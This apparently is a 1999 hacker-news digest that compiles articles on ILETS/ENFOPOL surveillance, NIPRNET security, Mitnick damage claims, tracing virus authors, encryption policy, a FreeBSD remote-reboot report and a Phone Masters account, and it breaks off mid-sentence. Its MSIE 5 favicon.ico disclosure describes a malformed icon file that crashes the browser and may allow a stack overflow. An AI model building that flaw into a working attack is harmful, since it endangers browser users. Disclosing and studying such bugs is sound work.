ENFOPOL wiretapping secret organization ILETS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by weld An FBI-founded organization called ILETS, which has met in secret for 6 years, has led initiatives around the world to build comprehensive interception systems into new telecommunications systems. This include requiring European ISPs to have special sniffing equipment installed on their networks. ILETS AND THE ENFOPOL 98 AFFAIR http://www.heise.de/tp/english/special/enfo/6398/1.html THE ENFOPOL 98 AFFAIR http://www.heise.de/tp/english/special/enfo/6397/1.html SPECIAL INVESTIGATION: ILETS AND THE ENFOPOL 98 AFFAIR Duncan Campbell 29.04.99 America's guiding hand revealed - the secret international organisation behind Europe's controversial plans for Internet surveillance Europe's 21st century tapping plans were born in an unlikely location. Fifty kilometres south of Washington DC, on the swampy western boundaries of the Potomac river is Quantico, Virginia. Here, on a large military reservation, is the FBI's training academy and research and development centre. Members of the public have no access to the high security site. Between 1990 and 1992, the FBI had tried repeatedly to get the US Congress to pass new laws for telephone tapping. The agency was worried that new digital telephone systems did not allow them easy access to track and intercept their targets. Their goal was to turn every type of modern communications systems into a national and, ultimately, global surveillance network which would give them "real time, full time" access to those whom they wanted to watch. The FBI experts ignored the costs imposed by their demands. They wanted manufacturers and network operators to provide systems at their own expense. Nor were they interested in the checks and balances of laws intended to control monitoring and protect privacy. Lawyers were not invited. Civil society would have to pay its own costs. Faced with the roadblocks in Congress, early in 1993 the FBI tried a new approach. They invited US allies to come to Quantico. Law enforcement and security agency representatives met there, calling themselves the "International Law Enforcement Telecommunications Seminar". Seen in retrospect, the title "seminar" is a black joke. Acting in secret and without parliamentary knowledge or government supervision, the FBI through ILETS has since 1993 steered government and communications industry policy across the world. In the shadows behind the FBI stood the NSA (National Security Agency), whose global surveillance operations could only benefit if, around the world, users were systematically to be denied telecommunications privacy in the information age. The countries who came to Quantico in 1993 were traditional US intelligence allies like Canada, the UK and Australia. There was also a core Euro group interested in developing extended surveillance systems - Germany, France, the Netherlands, Sweden (and the UK). Other representatives came from Norway, Denmark, Spain and even Hong Kong. The FBI tabled a document called "Law Enforcement Requirements for the Surveillance of Electronic Communications", written in July 1992. In June 1993, EU ministers meeting in Copenhagen agreed to poll member states on the issues raised by the FBI and by ILETS. After discussions in Europe later in 1993, ILETS met in Bonn early in 1994. By now Austria, Belgium, Finland, Portugal and Spain had joined the 19 member group. At their Bonn meeting, ILETS agreed joint policy in a document called "International Requirements for Interception". This said that "law enforcement representatives and government telecommunications experts from a number of countries that attended an international workshop on interception and advanced telecommunications technologies identified the need for this document". It was their "common requirements". Attached to the two page ILETS policy paper was a detailed, four page set of monitoring requirements and a glossary. This list of "International User Requirements" was identified as "IUR 1.0" or "IUR95". The ILETS meeting in Bonn also instigated two new policies. ILETS wanted international standards bodies such as the ITU (International Telecommunications Union) and ISO (International Standards Organisation) to build in tapping requirements to new system specifications. ILETS also wanted governments to agree on monitoring across international boundaries, so that one agency could intercept communications in another country. In March 1994, the Dutch government proposed that Europe adopt IUR 1.0. But ministers were not told that the document had been written by ILETS. Instead, it was identified as an ENFOPOL document, eventually being called ENFOPOL 90. (ENFOPOL is a standard European Commission classification for documents concerned with Law Enforcement/Police matters.) European Ministers never discussed ENFOPOL 90. It was agreed by a "written procedure", by exchange of telexes. It remained completely secret for nearly two years, and was not published in the Official Journal of European policy until November 1996. Meanwhile, European telecommunications operators were told to fall in line with its requirements. According to the British Home Office (Interior Ministry), for example, the resolution is "used as a basis for discussion with telecommunications operators in accordance with [UK monitoring legislation]". ILETS had also raised the problem of satellite-based mobile phone systems (such as Iridium). These phone systems link subscribers via satellites that are not under government control. This led to a British proposal to the European Commission: "Governments ... will have to create new regulations for international co-operation so that the necessary surveillance will be able to operate." In a slightly modified form, IUR 1,0 became law in the United States in October 1994. Other European nations, and Australia, later incorporated it in their domestic legislation. Within two years from the first ILETS meeting, the IUR had, unacknowledged and word for word, become the secret official policy of the EU and law around the world. Sixteen Nations from ILETS met again in Canberra in 1995 and agreed to try and persuade international standards organisations to adopt the IUR "requirements". This would mean that manufacturers of new exchanges or communications systems would have to build in interception interfaces in order to meet the international standards, free of charge. If this ploy succeeded, then security and law enforcement agencies would save money and make tapping easier, since new networks would come with monitoring systems built in. At their Canberra meeting "participating countries undertook to write to "relevant standards bodies and committees" informing them that their country along with other countries has adopted the IUR as a basis for its national and system-specific requirements .... ". Once again ILETS succeeded. In June 1997, the Australian government persuaded the International Telecommunications Union (ITU) to adopt the IUR requirements as a "priority". They told the ITU that "some countries are in urgent need of results in this area". During 1995 and 1996, through the European Commission, ILETS also effectively turned the IUR into an international treaty. The EU invited countries who had attended ILETS meetings to endorse the still-secret 1995 monitoring policy - that is, IUR 1.0. Non-EU ILETS members were told that "the Council considers that the lawful monitoring of telecommunications systems is an important tool in the prevention and detection of serious crimes and in safeguarding national security. ... The Member States of the European Union have been called upon to apply those Requirements to telecommunications operators and service providers... " Canada, Australia, Norway and the United States wrote back to the EU president, confirming their agreement By now, ILETS had spawned two sub committees, one re-designing the IUR and another (called STC, the Standards Technical Committee) working on technical standards. ILETS and its experts met again in Dublin in 1997. In 1998, they met in Rome, Vienna and Madrid. The IUR was not changed in 1997. But ILETS and its expert committees were at work, defining new requirements to cover the Internet and satellite based systems. They also wanted stringent new security requirements to be imposed on private telecommunications operators. The expert committees drew up new "requirements" to intercept the Internet. During July 1998, ILETS experts met in Rome to settle the new IUR and its attached "glossary". The result was ENFOPOL 98 . In Vienna on 3 September 1998, the revised IUR was presented to the Police Co-operation Working Group. The Austrian Presidency proposed that, as had happened in 1994, the new IUR be adopted verbatim as a Council Resolution on interception "in respect of new technology". Delegates were told that ENFOPOL 98's purpose was to "clarify the basic document (IUR 1.0) in a manner agreed by the law enforcement agencies as expressing their common requirement". But ILETS and its experts had become overconfident. IUR 1.0 had been four pages long. The new IUR (ENFOPOL 98) was 36 pages. The Austrian officials were told that this was politically inadvisable - perhaps that it would frighten ministers by its explicitness. Or, as the IUR experts were later told, "the wide range covered by ENFOPOL 98 was not conducive to ready comprehension". In October 1998, ILETS' IUR experts met in Vienna and Madrid and agreed a shorter, 14 page paper. Some of its more controversial provisions were put into other papers. European police delegates met in November to consider and agree the revised ENFOPOL 98 (rev 1). Suddenly, there was a new factor for the ILETS experts to consider. On 20 November, Telepolis broke the ENFOPOL 98 story, publishing the full text in German nine days later. The story became Internet news around the world. After this, and thanks to two further revisions by the German presidency, ENFOPOL 98 (now renamed ENFOPOL 19 - see news story ) shrank to a mere 6 pages long. Its key provisions are being hidden elsewhere. The most chilling aspect of the ILETS and ENFOPOL story may not even be the way in which the US-led organisation has worked in the dark for more than 6 years to built snooping trapdoors into every new telecommunications system. Their determination to work in the dark, without industry involvement or legal advice, without parliamentary scrutiny or public discussion, has blinded them to the idea that not all "law enforcement" is a public good. Throughout its life, Hong Kong - now incorporated in the People's Republic of China - has been a member of ILETS. By planting its requirements on bodies like the ITU and ISO, the police and security agencies involved have effectively acted as an international treaty organisation. But they were blind to any interests other than their own narrow world-view. "In the name of law and order, the US is now pursuing an international accord that urges stronger surveillance capabilities in nations with appalling human-rights records" says Susan Landau, co-author of Privacy on the Line. By taking Hong Kong into their club, they have shared their advanced ideas on surveillance with the butchers of Tienanmen Square. By seeking the ITU's imprimatur on building surveillance into new communications systems, they have handed the vile butchers of the Kosovans and the Kurds the future tools to seek out and murder their opponents. The new IUR will be welcome news in Thailand and Singapore, and everywhere where enemies of liberty thrive. Even if you are a conservative European or US politician, this can only be a source of shame. ILETS has thrown the vital principles of the European Convention and the US Constitution into the dustbin. That, above all, is why the secret processes of ENFOPOL 19, 98 and the rest should be brought to a halt. Democratic society requires nothing less than full and considered public discussion of these important issues. -=- THE ENFOPOL 98 AFFAIR Duncan Campbell 29.04.99 Euro police press on ... and America's guiding hand is revealed THE LATEST VERSION of the ENFOPOL 98 interception plan has just been leaked in London. It reveals that although the name of the key document has been changed, European Commission officials still want to make tapping the Internet official European policy by the end of May. They are pressing on, despite strong domestic opposition in Germany and Austria and recent condemnation by the European Parliament. The new document is called ENFOPOL 19. It was obtained this week by Caspar Bowden of the London-based Foundation for Information Policy Research . ENFOPOL 19 was written at a police officials' meeting in Brussels on 11 March, and was issued by the German presidency on 15 March. According to the British government, "the German Presidency has indicated that it hopes to seek agreement to the draft Council Resolution at the Justice and Home Affairs Council in May". The Council will meet on 27-28 May. ENFOPOL 19 still concerns "interception of telecommunications in relation to new technologies". But instead of detailing massive new requirements for tapping the Internet and other new communications systems, the police group is now pretending that it is not a new policy at all. Referring to the first European tapping plan of 1995, ENFOPOL 19 says that "the requirements of law enforcement agencies ... are applicable both to existing and new communications technologies, for example satellite telecommunications and Internet telecommunications". Thus, it claims, the "technical terms" in the 1995 plan "are to be interpreted as applying to ... in the case of the Internet, the static and dynamic IP address, credit card number and E-mail address". In fact, the 1995 policy says nothing about credit card numbers being used to tap telecommunications. The new document points out that when tapping the Internet, it is not necessary to ask for the details of the sender and the recipient, because these are included in every "datagram" or IP packet. So new regulations for the Internet may not be needed. But this is a deceptive manoeuvre. Successive redrafts of ENFOPOL 98 reveal that the original, highly controversial plan exposed by Telepolis has been broken up into at least five parts, which are now being handled separately: Plans for tapping Iridium and other satellite-based personal communications systems have been separated and are being discussed at a high level in the Commission; Part of ENFOPOL 98 which set out new requirements for personal data about subscribers will be included in "other Council Resolutions to be adopted"; Another resolution will require Internet Service Providers to set up high security interception interfaces inside their premises. These "interception interfaces" would have to be installed in a high security zone to which only security cleared and vetted employees could have access. This is not included in ENFOPOL 19; ENFOPOL 19 also suggests that some tapping systems could operate through a "virtual interface". This would mean installing special software at Internet access points, controlled remotely by government security agencies. A fourth new policy concerning cryptography is now being dealt with separately. The police group now plan that the old and new resolutions will be put into a monitoring "manual", together with detailed instructions on intercepting the Internet. This will include "technical descriptions" which have been taken out of the original ENFOPOL 98 . If this manoeuvre succeeds, then ENFOPOL 98 will escape scrutiny by being smuggled through in parts, while the European Parliament is dissolved (because of the June Euro-elections). But the biggest secret about ENFOPOL 98 has never been told, until now. The controversial document wasn't written by European governments or the European Commission. Both ENFOPOL 98 and Europe's 1995 monitoring policy were written by a US-dominated group of security and law enforcement agency experts, called ILETS. This group does not include any industry or human rights and privacy law advisers. Over the last six years, ILETS has single-handedly forced governments and international standards bodies to build in their "requirements" to laws, networks and new communications systems. Their activities have never been reported to national Parliaments, the European Parliament or even the US Congress. Not until Telepolis revealed the ENFOPOL 98 affair has the secret ILETS organisation been exposed or challenged. @HWA 04.0 NIPRNET to beef up security by *koff* installing firewalls...(wah hahahahaha) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NIPR to install Firewalls to Thwart Hackers From HNN http://www.hackernews.com/ contributed by erehwon The factual inaccuracies in this article are blatant. The Defense Information Systems Agency (DISA) plans to redesign its Non-Classified Internet Protocol Router Network (NIPRNet). While this article touts this 'redesign' as some sort of massive undertaking it sounds like they are just going to install a few firewalls. Oh, yeah, that will keep all the hackers out. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0503/fcw-newsdodnet-5-3-99.html MAY 3, 1999 DOD net overhaul to thwart hackers BY BOB BREWIN (antenna@fcw.com) The Defense Department has started an overhaul of its global unclassified network to fight off the barrage of hacker attacks the department's systems suffer and to increase capacity to handle a huge rise in traffic to and from the Internet. The Defense Information Systems Agency plans to redesign its Non-Classified Internet Protocol Router Network, DOD's primary entry into commercial World Wide Web sites, to take advantage of enhanced security measures and to improve overall performance. The NIPRNET redesign, scheduled for completion in December with main network components slated for installation no later than June, will provide DOD with a network better designed to stave off hacker attacks that hit DOD systems at a rate of 250,000 a year, according to a DOD source briefed on the network plan. Tony Montemarano, chief of Defense Information Systems Network services for DISA, said the agency is well on its way with the NIPRNET upgrade. "The equipment is purchased, and we are upgrading software loads," Montemarano said. He said that besides providing security, the NIPRNET upgrade also will provide "protection against denial-of-service attacks.... We want to be able to guarantee the availability of the network as well as provide additional security for the users." DISA's plans include the filtering of what DISA called "notorious" protocols routinely exploited by hackers, according to briefing slides obtained by Federal Computer Week. The protocols include the PostOffice Protocol (POP), which allows remote users to read e-mail stored on a central server; remote-access protocols, which allow users to read their e-mail from another system; and Packet Internet Groper (Ping), which hackers use to disable networks by overloading them with a command. According to the briefing slides, DISA plans to start filtering out these protocols by July. But the agency said it has not made any decision yet on which protocols to filter. Montemarano declined to quantify the degree of security that the NIPRNET upgrade will provide, except to say, "It will be better...and performance will be improved considerably." DISA is doubling the number of NIPRNET connections to the Internet because of the huge increase in traffic spurred by the development of the World Wide Web and the amount of information residing on Web sites outside NIPRNET, Montemarano said. "There is so much information out there our users want," he said. Increasing capacity also is a security measure. The inability of NIPRNET to handle the loads imposed by Web traffic without lags or delays had resulted in numerous military commands installing Internet "backdoors" on their systems. DISA is looking to eliminate such backdoor connections. According to the DISA briefing, no unit or command will be allowed to connect a local- or wide-area network to NIPRNET until the network goes through a formal connection approval process. Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems Command, said he believes the NIPRNET redesign offers a better security alternative than the almost total retreat from the Internet advocated by Lt. Gen. William Campbell, the Army's director of information systems for command, control, communications and computers. "Campbell accurately addressed the threat," Gauss said, "but the thing I have to ponder is, [considering] the amount of electronic commerce we do with industry, is it viable just to disconnect from the Internet? What DISA is doing will protect DOD computing and still give us a viable means of communicating with industry." @HWA 05.0 Mainstream media questions some of Mitnicks accrued damages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Hacker" Racks up $291.8 Million in Damages. From HNN http://www.hackernews.com/ contributed by Weld Pond Finally some mainstream press about the outrageous claims made by NEC America Inc., Nokia Mobile Phones, Sun Microsystems Inc. and Novell Corp. These companies claim substantial losses that they have attributed to Kevin Mitnick. LA Times http://www.latimes.com/HOME/BUSINESS/CUTTING/t000039748.1.html Letters citing damages http://www.hackernews.com/orig/letters.html FREE KEVIN http://www.freekevin.com Heard on the Beat Firms Say Hacker Cost Them $291 Million By GREG MILLER LA Times For a guy who never seemed to profit from his hacking habit, Kevin Mitnick sure took a big bite out of the high-tech economy, if newly disclosed damage estimates from his victim companies are to be believed. Mitnick's hacking cost high-tech companies at least $291.8 million over a two-year span before his capture, according to estimates provided to the FBI by NEC America Inc., Nokia Mobile Phones, Sun Microsystems Inc. and Novell Corp. The damages are listed in previously undisclosed letters that were obtained by 2600 magazine, a pro-hacker publication that has posted the letters on its Web site. The damage estimates vary widely. NEC said Mitnick stole software code worth $1.8 million. But Nokia figures Mitnick cost the company at least $135 million, including $120 million in lost revenue "due to new developments being delayed in reaching the market." Skeptics say the estimates border on fantasy and point out that the companies did not report these hefty setbacks in public financial statements.But the estimates underscore the ambiguities of assessing damages in hacking cases.Some argue that hackers should be accountable for the cost of developing the software they steal, even though they are only taking a copy. Mitnick himself once argued that was akin to saying someone who shoplifts a 49-cent Bic pen ought to be accountable for the millions of dollars Bic has spent developing and marketing it.The issue is still significant for Mitnick, who pleaded guilty to various hacking charges last month but awaits a ruling on the restitution he will be ordered to pay victims. "We're going to make a submission for an amount of restitution we consider appropriate," said Assistant U.S. Atty. Chris Painter, "not necessarily the full amount of the loss that was caused." Copyright 1999 Los Angeles Times. All Rights Reserved @HWA 06.0 CyberCrooks easier to catch? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sangfroid This Associated Press article seems to think that cyber crooks are easier to catch. Using the authors of Melissa and CIH as well as the man who posted a false news story causing fluctuations in a companies stock as examples for this claim. Unfortunately the author has little or no understanding of how the net actually works.Bad guys are not getting easier to catch there are just more stupid ones. Las Vegas Sun http://www.lasvegassun.com/sunbin/stories/tech/1999/apr/30/043000242.html April 30, 1999 Catching Hackers Becoming Easier ASSOCIATED PRESS NEW YORK (AP) -- They never unmasked the hacker responsible for Michelangelo, a famous computer virus that threw a scare into the high-tech world in 1992. But it took just days to identify the people believed responsible for two viruses that struck this year. Cybercops also had no trouble finding the man who allegedly posted a fake news story this month about a corporate merger that caused one company's stock to gyrate. In at least two of these cases, investigators used the digital footprints that every user of the Internet leaves behind to trace the source of the trouble. While this may force virus writers or hoaxers to think twice before they strike, it also shows how easy it is for anyone -- a government investigator or a skilled salesperson -- to follow your every online move. "The same technology that tracks individuals is used to solve crimes and vice versa," said Ari Schwartz, a policy analyst for the Center for Democracy and Technology, an Internet civil liberties group in Washington. "It's melded into one kind of surveillance technology which could lead to an erosion of privacy." Actually, there's nothing all that complicated about how the law enforcers crack a case on the World Wide Web. In fact, it's similar to the way telephone records are used by investigators. The online accounts that most people use to roam the Web or send e-mail are assigned a unique stamp, or "Internet protocol address," that helps direct the exchange of data between a Web site and its visitors. Those IP addresses leave digital footprints that -- unfortunately for the ill-intentioned -- don't get wiped out as easily or quickly as a trail of bread crumbs. Little is known about Chen Ing-hau, the 24-year-old Taiwanese man identified on Thursday as the author of Chernobyl, a virus that crippled hundreds of thousands of computers this week. But IP addresses were clearly pivotal in tracking down the alleged merger hoaxter, Gary Dale Hoke. The 25-year-old North Carolina man was arrested two weeks ago after he allegedly posted a fictional story April 7 saying his employer, PairGain Technologies, was about be taken over by another company. The false report caused PairGain's stock to rise sharply, then fall after the hoax was uncovered. Hoke, officials said, attempted to conceal his identity with pseudonyms and fake e-mail addresses, but was identified through an IP address. He was charged Friday with five counts of securities fraud, punishable by up to 50 years in prison and $5 million in fines. IP addresses were also used to track down David L. Smith, a 30-year-old network programmer from New Jersey accused of creating the Melissa e-mail virus with a stolen America Online account. Melissa, allegedly named after a topless dancer in Florida, appeared on March 26 and spread rapidly around the world, clogging e-mail accounts and shutting down computer networks worldwide. But IP addresses weren't the only clues used in the Melissa investigation, and that's what troubles privacy advocates. The main difference in the Melissa investigation was the use of a serial number embedded in documents written with the popular program Microsoft Word. "We could go around society with tattoos on our forehead and cameras everywhere, but most people wouldn't like that. But that's what these serial numbers do," said Schwartz, whose organization has filed a federal complaint over a similar serial number embedded in Intel's new Pentium III computer chip. "Law enforcement has a lot of tools out there to find out who these people are. We want them to find crooks," Schwartz said. "But when we make technology, do we want technology that brands individuals, that's puts our serial numbers everywhere as we visit? There has to be some sense of anonymity online." @HWA 07.0 Nasa has security concerns, doesn't report cyberattacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon Roberta Gross, NASA's inspector general, told a Senate subcommittee that parts of NASA are failing to report cyber attacks and that some do not have proper security in place. She went on to claim that an internal NASA organization, NASA's Automated Systems Incident Response Capability, was not performing its job adequately. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0503/fcw-newnasa-5-3-99.html (ed's note, this gave me a 404 when I tried it i'll try and find the correct link and post the article here) Roberta Gross also is quoted in this article as saying that although the attacks where not reported her office learned of them from "other ways". Hmmmmm, wonder what that means @HWA 08.0 Encryption debate called for ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee said he would like to see a campaign-style debate on encryption pitting members of Congress and the Clinton administration against U.S. lawmakers. CNN http://www.cnn.com/TECH/computing/9905/04/encryption.idg/index.html U.S. advisor seeks full-blown debate on encryption May 4, 1999 Web posted at: 7:51 a.m. EDT (1151 GMT) by Margret Johnston (IDG) -- The chairman of an organization that advises the U.S. Congress on Internet issues yesterday said he would like to see a campaign-style debate on encryption pitting members of Congress and the Clinton administration who oppose relaxing U.S. encryption laws against U.S. lawmakers who favor loosening them. Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee, said he would push for the debate to be held sometime this year. He added that he would favor participation from U.S. lawmakers who have spoken out against relaxing U.S. restrictions on the export of encryption technology above 56 bit. "I want a face-to-face debate," Berman said during a luncheon for congressional staff members sponsored by the caucus. "Let them go at it." Sen. Diane Feinstein (D-Calif.) and Rep.Michael Oxley (R-Ohio) would be ideal participants, Berman said. And the director of the FBI Louis Freeh would be another good candidate to take part in the debate.But there has been no agenda or date set for the event, Berman said. The two lawmakers and Freeh have opposed legislation that would change the current U.S. encryption law on the grounds that it would weaken law enforcement's ability to catch suspected criminals, particularly terrorists and drug dealers, because they could use the high-level encryption to prevent access to potential evidence stored on their computers. Supporters of a change in U.S. encryption law say those arguments are baseless because high-level encryption is easily obtainable and the U.S. law has only hamstrung American businesses who want to sell and use such encryption outside the U.S. Berman announced that, in addition to the encryption forum, the caucus by year-end would hold forums on privacy, content and broadband technology. "The goal is to educate policy makers about the Internet as a technology," Berman said. "We need to explain to policy makers what these issues are." The Internet Caucus Advisory Committee comprises 120 public interest groups, corporations and associations. Members typically favor maintaining the decentralized, deregulated global aspects of the Internet, Berman said. He added that the caucus got off the ground because Congress passed the Communications Decency Act (CDA) without first asking itself whether it fully understood technology and how the Internet works. The CDA was later ruled unconstitutional by the Supreme Court. @HWA 09.0 Product: Hackers stopped cold by 'BlackICE'? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9904/22/blackice.idg/ Start-up puts hackers on BlackICE April 22, 1999 Web posted at: 1:35 p.m. EDT (1735 GMT) by Ellen Messmer (IDG) -- Network Ice, a hot security start-up for intrusion detection, this June plans to ship its first software-based suite for stopping the wily hacker cold. To protect Windows-based desktops and servers from hack attacks, Network Ice is providing software called BlackICE Pro. If BlackICE software spots evidence of mischief, it responds by alerting the user or the administrator of the problem. It can also shut down all communication to and from the source of the intrusion attempt. BlackICE Pro software, which costs $37 per node for 1,000 nodes, will issue a report of any trouble to the Web-based security management console called ICEcap (an acronym for "consolidation, analysis and presentation"). According to Greg Gilliom, CEO of Network Ice, the ICEcap reporting engine uses a technology dubbed "Collective Awareness" to analyze the nature of the intrusion attempt. If needed, it will inform all BlackICE-protected desktops or servers if a systemic corporate-wide attack appears to be under way. Since hackers are constantly upgrading their attack exploits, the BlackICE software is going to have to be updated regularly, much like anti-virus software, Gilliom points out. To do this, ICEcap can "push" intrusion-detection updates down to BlackICE software without disrupting computer activity. "We detect over 200 attack signatures, such as ping sweeps or denial-of-service attacks," Gilliom claims. "We're protocol experts - we know how to exploit protocols. But we're trying to provide a system of administration and protection for small companies that aren't aware of all these issues." Gilliom and the other Network Ice co-founders Robert Graham and Clinton Lum all held senior engineering positions at Network General (now Network Associates after its merger last year with McAfee Associates). The BlackICE suite is host-based intrusion-detection software for Windows. The start-up is also working on an NT-based probe called BlackIce Sentry that would be able to scan for trouble Unix machines, mainframes or databases. The company has no specific shipping date for BlackIce Sentry. Network Ice Chief Technology Officer Robert Graham says that one of the most vulnerable points within the enterprise network today is that presented by the telecommuter or remote access user. "The problem with VPNs and notebook computers is that firewalls are being bypassed by remote dial-in users," Graham says. "When we've put our software on a lot of people's machines, we see virtually everyone will undergo a hacker attack within just a few weeks." This is because the hackers with their automated tools are targeting remote access users to find out their IP addresses or access methods in order to weasel their way into the corporate intranet, Graham claims. Therefore, even companies using VPNs or firewalls can benefit from a desktop-based intrusion-detection system used for remote access. "We see three types of hackers out there," Graham says. "There are voyeurs, like peeping toms; graffiti artists that trash the Web site and tell their friends; and criminals who steal things, such as customer lists." @HWA 10.0 FreeBSD 3.1 remote reboot exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Message-ID: <19990501031840.A24252@dilbert.exodus.net> Date: Sat, 1 May 1999 03:18:40 -0500 Reply-To: jamie@exodus.net Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Jamie Rishaw <jamie@exodus.net> Subject: FreeBSD 3.1 remote reboot exploit To: BUGTRAQ@netspace.org Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers <jimmie> In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's @HWA 11.0 More on the MSIE favicon.ico bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://web.cip.com.br/flaviovs/sec/favicon/index.html MSIE 5 favicon bug Description There's a bug in MSIE 5 when handling the favicon.ico file downloaded from a web site. By creating a icon file with bad data, it's possible to crash MSIE 5. The stack is filled with information from the icon file so it may be possible to create an icon file with data which would end executing code on the client machine. The favicon.ico icon file The favicon.ico file is an icon file in the MS-proprietary icon file format. It is downloaded by MSIE 5 when the user asks it to add the page's URL to his/her "Favorites" list. When the user selects to add the URL, MSIE 5 downloads the file and shows the icon on the "Favorites" menu. The request for the favicon.ico file is first done on the same path of the current URL. If the file is not found, MSIE 5 will backup one directory in the directory hierarchy and try again. It will do this until it finds the file or reaches the web server root (e.g. if you try to bookmark this page, MSIE 5 will look for favicon.ico in http://web.cip.com.br/flaviovs/sec/favicon/, http://web.cip.com.br/flaviovs/sec/, http://web.cip.com.br/flaviovs/ and http://web.cip.com.br/). Impact MSIE 5 will crash when trying to interpret/show such icon file. It's unknown if it's possible to create an icon file which will trigger code execution on the client machine, but evidences show that it may be possible (i.e. it looks like a stack buffer overflow). Workaround It seems it's not possible to turn off the favicon.ico loading feature. Thus the only workaround is not to add any non-trusted site to the "Favorites" list and wait for a patch from Microsoft. Example If you're using MSIE 5 with Javascript enabled, you can feel the bug in action. Otherwise just try to bookmark this page (note: this will crash your browser). Here's the favicon.ico file that triggers the bug. It's composed of an bogus header followed by lots of "A" characters. What Microsoft is Doing Apparently, nothing. I reported the bug twice, the first one about one month ago, the last time about two weeks ago. I didn't receive any reply. Disclaimer All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by the use or minuse of information here contained. Related Documents Web Workshop Getting Ready for Internet Explorer 5 http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp Apache Week: 9th April 1999 http://www.apacheweek.com/issues/99-04-09 Privacy Issues about the favicon.ico File (below) About This bug was discovered in april 1999 by Flavio Veloso <flaviovs@centroin.com.br>. Privacy Issues about the favicon.ico File Description Every time you bookmark a page in MSIE 5 it will send to the web server a request for a file named favicon.ico (see "MSIE 5 favicon bug" for an explanation about what this file is, along other nice things). This give to web servers admins a way to know that someone has bookmarked it's site; the info includes the date and time of the operation plus the address IP of the machine which bookmarked the site. This may or may not bother you. Impact MSIE 5 will reveal to web servers admins that you bookmarked their sites. Workaround It seems that it's not possible to turn off this feature, so if this bother you, don't bookmark sites with MSIE 5 or don't use it at all. What Microsoft is Doing Microsoft was not contacted about this issue. They were already informed about a a much more dangerous issue about the favicon.ico file and took no measure to fix it in about one month. I don't have plans to contact them about this privacy issue just because I don't want to waste my time anymore with this. Disclaimer All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by the use or minuse of information here contained. About This issue was discovered in april 1999 by Flavio Veloso <flaviovs@centroin.com.br>. @HWA 12.0 Simple Nomad sheds some light on the Phone Masters ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Last week we followed up a story from HNN on the Phone Rangers/Phone Masters the actual proper group name was the PHONE MASTERS and NOT the 2600 group the Phone Rangers, we aplogize for the inaccuracy. From HNN http://www.hackernews.com More Info on Phone Masters contributed by Simple Nomad Simple Nomad sheds some light on the Phone Masters and the latest reporting on the GTE Telecom hacking. This is an HNN exlusive. HNN Report (See below) HNN correction: Correction: We made an error on Friday and mentioned the "Phone Rangers" as the group that broke into GTE's telecom network. This was the "Phone Masters". Phone Master Hacks By: Simple Nomad Robert Riggs, the reporter for WFAA who reported the "cyber-terrorism" story http://www.wfaa.com/news/9904/29/ cyber_terrorism_1.html, had contacted me about two weeks ago as he was preparing the story. I was requested to appear on camera and discuss how vulnerable the nation's infrastructure was. I am glad I declined, considering the FUD. The sad thing about this story is that just talking with Riggs about what had happened was actually quite interesting, and I thought he had quite a scoop. But since his report lacked a lot of the details, here is what I know. The Phone Masters were a group of experienced phreakers and hackers, who had been infiltrating GTE, Sprint, MCI, and several Baby Bells. They had access to pretty much everything. GTE, the Bells, and the others had no idea these guys were into their systems. They apparently had access to pretty much everything, hence they had the ability to "wreak havoc". There have been at least 7 arrests that I am aware of, including 5 of the group and 2 private investigators in Dallas. The charges supposedly range from various computer crimes to various phone fraud felonies. I suspect there will be a conspiracy charge as well. There appears to have been two distinct philosophies at work here, one criminal, and one VERY criminal. Part of the Phone Masters were profitting financially from the hacks, while part were just exploring the phone systems. It appears the reason they were caught is that one of the non-profitting guys became angry after learning of the guys selling information, and ratted them out. Had this not happened, they'd still be deep inside the phone systems. The Feds and the phone companies feel comfortable they have all of "them" out of the phone systems and that the nation can rest easy. A real interesting thing with this case is that it supposedly marked the first time the FBI used taps on phone lines that allowed the Feds to view the online sessions. I wish I had more technical detail here, Riggs referred to it as an "analog" trace, but the basics seemed to be somewhat like the Shimomura "videos" of Mitnick at http://www.takedown.com/. I'm willing to bet a certain Mr. Shimomura helped set the Feds up with this capability. The main alleged criminal things were that several of the Phone Masters were selling credit reports and other personal info (hence the arrest of the 2 PI's, who were "information brokers"), selling of long distance access codes, and pilfering and exploitation of credit card numbers. This is probably the main area where the Feds will make their case, being that it is more "criminal" than simply gaining access and poking around, although my guess is 